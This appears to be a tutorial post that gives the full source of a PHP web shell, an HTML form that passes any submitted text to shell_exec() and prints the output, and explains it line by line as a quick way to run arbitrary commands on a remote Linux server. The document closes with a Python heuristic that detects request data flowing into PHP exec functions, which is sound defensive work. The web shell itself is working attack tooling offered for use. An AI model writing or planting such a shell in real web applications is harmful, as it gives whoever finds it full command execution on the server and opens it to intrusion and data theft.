Here is a simple PHP shell script which took less than 10 minutes to write. This tiny script lets you execute arbitrary shell commands or browse the filesystem on a remote Linux server.
<HTML>
<HEAD>
<TITLE>Simple PHP Shell</TITLE>
</HEAD>
<BODY>
<form action="shell.php" method=post>
<input type="text" NAME="c"/>
<input name="submit" type=submit value="Command">
</FORM>
<?php
if(isset($_REQUEST['submit']))
{
$c = $_REQUEST['c'];
$output = shell_exec("$c");
echo "<pre>$output</pre>\n";
}
?>
</BODY>
</HTML>
The script has two parts: HTML and PHP.
HTML
1. This is the start of HTML code.
<HTML>
2. Create a HEAD section for the HTML page and declare “Simple PHP Shell” as its title.
<HEAD>
<TITLE>Simple PHP Shell</TITLE>
</HEAD>
3. Create BODY section for the HTML page.
<BODY>
4. Create a form which calls shell.php. Please note, this assumes that this script is saved as shell.php.
<form action="shell.php" method=post>
5. Create a text input field with the name of “c”.
<input type="text" NAME="c"/>
6. Create a button with the name of “submit” with the label “Command”.
<input type=submit name="submit" value="Command">
7. Close the form.
</FORM>
PHP
1. The PHP code is embedded in the HTML code and the start is marked by
<?php
2. Check whether the form has been submitted. If the request variable ‘submit’ exists, the user has clicked the “Command” button. If not, do nothing.
if(isset($_REQUEST['submit']))
3. Declare “$c” as a variable and set it to the contents of the input field ‘c’ from the HTML form.
$c = $_REQUEST['c'];
4. Declare “$output” as a variable to hold the return value from the shell_exec() function. “$c” is the command that the user entered in the input field.
$output = shell_exec("$c");
5. Show the result.
echo "<pre>$output</pre>\n";
6. Declare the end for the PHP code.
?>
Closing the HTML
1. Close the BODY section.
</BODY>
2. Declare the end for the HTML code.
</HTML>
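The pattern walked through above, a request parameter assigned to a variable and then passed to shell_exec(), is what a defender looks for when reviewing PHP files in a web root. The Python check below is an added example, not part of the original script; the function name find_request_to_shell and the list of functions it checks are choices made for this example.

```python
import re

# PHP functions that pass a string to the operating system shell.
EXEC_FUNCS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")
REQUEST_DATA = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b")
# Plain assignment "$var = ..." (not "==" or "=>"); the rest of the line is the value.
ASSIGN = re.compile(r"(\$\w+)\s*=(?![=>])(.*)")
# Function call, excluding method calls such as $pdo->exec(...).
CALL = re.compile(r"(?<!->)(?<!::)\b(%s)\s*\((.*)" % "|".join(EXEC_FUNCS))
VAR = re.compile(r"\$\w+")


def find_request_to_shell(php_source):
    """Heuristic, line-based check (not a PHP parser; assumes one statement
    per line). Returns (line_number, function) for every exec-family call
    whose argument is request data or a variable assigned from it."""
    tainted = set()
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        call = CALL.search(line)
        if call:
            args = call.group(2)
            if REQUEST_DATA.search(args) or tainted & set(VAR.findall(args)):
                findings.append((lineno, call.group(1)))
        assign = ASSIGN.search(line)
        if assign:
            name, value = assign.groups()
            if REQUEST_DATA.search(value) or tainted & set(VAR.findall(value)):
                tainted.add(name)
            else:
                tainted.discard(name)  # overwritten with non-request data
    return findings


# Constructed sample: the PHP part of the script shown on this page.
PAGE_SCRIPT = r"""<?php
if(isset($_REQUEST['submit']))
{
$c = $_REQUEST['c'];
$output = shell_exec("$c");
echo "<pre>$output</pre>\n";
}
?>"""

if __name__ == "__main__":
    for lineno, func in find_request_to_shell(PAGE_SCRIPT):
        print(f"line {lineno}: request data reaches {func}()")
```

A hit from this check is a lead for manual review, since a line-based heuristic can both miss obfuscated variants and flag legitimate administrative code.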